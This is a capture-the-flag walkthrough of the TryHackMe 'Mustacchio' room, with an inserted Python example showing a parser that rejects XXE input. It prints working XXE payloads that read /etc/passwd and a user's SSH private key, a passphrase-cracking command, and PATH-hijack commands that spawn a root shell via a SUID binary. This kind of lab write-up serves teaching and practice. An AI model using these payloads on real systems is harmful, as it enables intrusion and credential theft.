Mustacchio
https://tryhackme.com/room/mustacchio
User flag
We start by enumerating the machine with nmap.

We don't get any results, so let's use the -Pn flag to skip host discovery in case our ping probes are being blocked.


We see there are three open ports (22, 80, 8765). Heading to port 80, we see a website about moustaches.

Checking the robots.txt file gives us nothing interesting.

Let's try gobuster and see if we find something useful.

That "custom" directory seems interesting. Let's go check it.

If we download the users.bak file we can see some credentials (if we open the mobile.js file we can find a hash containing the same password, but with no user).

We used CrackStation to crack the hash:

Now if we head to port 8765 we find a nice-looking login webpage. Let's use the cracked credentials to log in.


Looking around the source code, we find a message saying that barry can use his SSH key to log in, and a path to a file called "dontforget.bak". Kinda tempting. Let's go check it.

There's nothing really interesting on it to be honest.

After a while looking around, trying to figure out what to do next, we found that we can insert XML code in that text field.

It seems we were mistaken earlier. The dontforget.bak file contains an XML structure that we can use to gain access to the machine.
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>joe</name>
<author>barry</author>
<com>his paragraph</com>
</comment>
Let's modify it to retrieve the passwd file.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<comment>
<name>pepe</name>
<author>pepito</author>
<com>&file;</com>
</comment>

Now that we know the website is vulnerable to XXE, we can try to get the SSH key belonging to barry. We assume it's in the common path: /home/user/.ssh/id_rsa
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY file SYSTEM "file:///home/barry/.ssh/id_rsa">]>
<comment>
<name>pepe</name>
<author>pepito</author>
<com>&file;</com>
</comment>
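A server-side check that would have stopped this, as an added example that is not part of the room or the original writeup: the comment parser below uses Python's stdlib expat with handlers that refuse any DOCTYPE, entity declaration or external entity reference, so the benign dontforget.bak document still parses while the payload above is rejected before any file is read. The element names come from the page; the function names and the two sample documents are mine.

```python
import xml.parsers.expat as expat

# Benign comment in the dontforget.bak format (constructed from the page).
BENIGN = """<?xml version="1.0" encoding="UTF-8"?>
<comment><name>joe</name><author>barry</author><com>his paragraph</com></comment>"""

# The XXE payload from the page, kept here only as a rejection test case.
XXE = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT data ANY >
<!ENTITY file SYSTEM "file:///etc/passwd">]>
<comment><name>pepe</name><author>pepito</author><com>&file;</com></comment>"""


class UnsafeXML(ValueError):
    """Raised when a submitted comment declares a DTD or an entity."""


def parse_comment(doc: str) -> dict:
    """Extract name/author/com from a <comment> document, refusing any DTD."""
    fields, text = {}, []
    p = expat.ParserCreate()

    def reject(*_):
        raise UnsafeXML("DOCTYPE and entity declarations are not allowed")

    # Abort on the DOCTYPE itself, on any entity declaration and on any
    # external entity reference, so expat never resolves a file:// URI.
    p.StartDoctypeDeclHandler = reject
    p.EntityDeclHandler = reject
    p.ExternalEntityRefHandler = reject
    p.StartElementHandler = lambda tag, attrs: text.clear()
    p.CharacterDataHandler = text.append

    def end(tag):
        if tag in ("name", "author", "com"):
            fields[tag] = "".join(text).strip()

    p.EndElementHandler = end
    p.Parse(doc, True)
    return fields


def is_rejected(doc: str) -> bool:
    """True when the document is refused as an XXE attempt."""
    try:
        parse_comment(doc)
    except UnsafeXML:
        return True
    return False
```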
Bingo. Now we can save it and log in using ssh.


It looks like we have to crack the passphrase first.
python /usr/share/john/ssh2john.py id_rsa > id_hash


Now we can log in and grab the user flag.

Root flag
Let's start with manual enumeration. We can't use sudo -l because we don't know barry's password, so let's see if there are any SUID files.
find / -perm -u=s -type f 2>/dev/null

/home/joe/live_log is not a common file. Let's check its content:

Using strings:

We see it runs "tail -f" without specifying an absolute path. That way we can create a file named "tail" that spawns a shell, prepend our own directory to PATH, and execute the binary to gain privileged access.
barry@mustacchio:/tmp$ echo "/bin/bash" > tail
barry@mustacchio:/tmp$ export PATH=/tmp:$PATH
barry@mustacchio:/tmp$ echo $PATH
/tmp:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
barry@mustacchio:/tmp$ chmod +x tail
barry@mustacchio:/tmp$ /home/joe/live_log

Bingo. We got root.